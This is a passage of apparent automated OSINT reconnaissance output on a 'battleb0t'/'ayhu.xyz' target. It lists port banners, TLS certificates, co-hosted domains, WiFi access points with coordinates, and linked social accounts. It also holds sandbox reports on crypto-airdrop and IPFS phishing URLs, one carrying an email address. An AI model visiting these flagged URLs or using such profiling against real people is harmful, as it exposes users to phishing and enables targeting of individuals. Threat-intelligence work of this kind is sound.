"openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/Battleb0t | Battleb0t |
| 2023-05-12 02:54:30 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 | 64.226.81.43 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.108): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00arthur00.github.io |
| 2023-05-12 02:52:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://t.length/32));return', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://docs.google.com/forms/d/e/1faipqlser-pujhmdg5fmasxykmvy3egptc-yai4up5by6hx5g_9wzaw/viewform', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://multi-trustpad.so/plutusdao/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ac8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ac8_IE_EarlyTabStart_0xbe8_Mutex"\n "IsoScope_ac8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ac8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2760"\n "IsoScope_ac8_ConnHashTable<2760>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ac8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2760"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.21.85:443"\n "156.146.53.13:443"\n "142.250.191.74:443"\n "104.17.25.14:443"\n "185.199.108.153:443"\n "151.101.1.229:443"\n "142.251.46.227:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kuzdaz.github.io"\n "maxst.icons8.com"\n "multi-trustpad.so"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "* Copyright 2011-2021 Twitter, Inc." (Indicator: "dir "; File: "420d1abc17e3c9ac_1_.css")\n Found string "<meta property="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsmulti-trustpad.soplutusdao")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpsmulti-trustpad.soplutusdao")\n Found string "<meta property="twitter:image" content="https://trustpad.io/_next/static/media/metaImg.4165ec37.png">" (Indicator: "dir "; File: "urlref_httpsmulti-trustpad.soplutusdao")\n Found string "<meta property="twitter:title" content="Airdrops on MultiChainPad\n The Exclusive Multi-Chain Airdrops">" (Indicator: "dir "; File: "urlref_httpsmulti-trustpad.soplutusdao")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df6f78936bb065a368.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{68782d33-eac7-11ed-8c12-08002729a14e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df974dd95ab78b92a1.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{68782d35-eac7-11ed-8c12-08002729a14e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{68782d33-eac7-11ed-8c12-08002729a14e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df6f78936bb065a368.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "web3modal_v2_1_.js" has type "data"- [targetUID: N/A]\n "ethers.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "seaport_1_.js" has type "data"- [targetUID: N/A]\n "modal~app.4224e3d5_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "app.42cee8c7_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "merkletree_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "lib~app.42bf6ad0_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "420d1abc17e3c9ac_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "connector~app.42c4fe3d_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "lodash.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "sweetalert2@11_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "CabCC9D.tmp" has type "data"- Location: [%TEMP%\\CabCC9D.tmp]- [targetUID: 00000000-00003956]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-NYi1Uw_1_.woff" has type "Web Open Font Format TrueType length 52156 version 1.1"- [targetUID: N/A]\n "iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4i1Uw_1_.woff" has type "Web Open Font Format TrueType length 51556 version 1.1"- [targetUID: N/A]\n "iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-WYi1Uw_1_.woff" has type "Web Open Font Format TrueType length 48160 version 1.1"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003956]\n "~DF2BF7D61A708DACB9.TMP" has type "data"- Location: [%TEMP%\\~DF2BF7D61A708DACB9.TMP]- [targetUID: 00000000-00002760]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002760]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFE8D9E98C1276228A.TMP" has type "data"- Location: [%TEMP%\\~DFE8D9E98C1276228A.TMP]- [targetUID: 00000000-00002760]\n "~DF6F78936BB065A368.TMP" has type "data"- Location: [%TEMP%\\~DF6F78936BB065A368.TMP]- [targetUID: 00000000-00002760]\n "~DF974DD95AB78B92A1.TMP" has type "data"- Location: [%TEMP%\\~DF974DD95AB78B92A1.TMP]- [targetUID: 00000000-00002760]\n "~DFB786444891F524CF.TMP" has type "data"- Location: [%TEMP%\\~DFB786444891F524CF.TMP]- [targetUID: 00000000-00002760]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "rocket-loader.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "plutusdao_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "RecoveryStore._68782D33-EAC7-11ED-8C12-08002729A14E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_68782D35-EAC7-11ED-8C12-08002729A14E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_728504A8-EAC7-11ED-8C12-08002729A14E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F01BC37A-EAC7-11ED-8C12-08002729A14E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003956]\n "app.426fbaca_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "css2_2_.css" has type "ASCII text"- [targetUID: N/A]\n "R3JMUNNR.txt" has type "ASCII text | 185.199.108.153 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007joshie.github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | bux180 (Net ID: 00:07:7D:16:27:67) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.3): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:46 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chantilly', u'security': {u'is_vpn': False}, u'city_geoname_id': 4751935, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'American Registry Internet Numbers', u'organization_name': u'American Registry Internet Numbers', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20151', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:45'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:50c0:8003::153', u'continent': u'North America', u'region_iso_code': u'VA'} | 2606:50c0:8003::153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-ye.github.io |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5c61b40afd1911-FRA
| 188.114.96.1 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.214 | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:26:95:98) | 50.1188, 8.6843 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.184): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 2 | 0 | 2 | 0 | None | https://www.ayhu.xyz/ | www.ayhu.xyz |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.229 | 104.196.30.220 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | +OK Dovecot ready.
| 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PM Guest (Net ID: 00:1C:10:F9:53:B8) | 32.8608, -79.9746 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/ayhu | ayhu |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLG86 (Net ID: 00:01:36:37:73:C0) | 34.0544, -118.244 |
| 2023-05-12 02:46:28 | Raw Data from RIRs | No | Hybrid Analysis | 3 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, 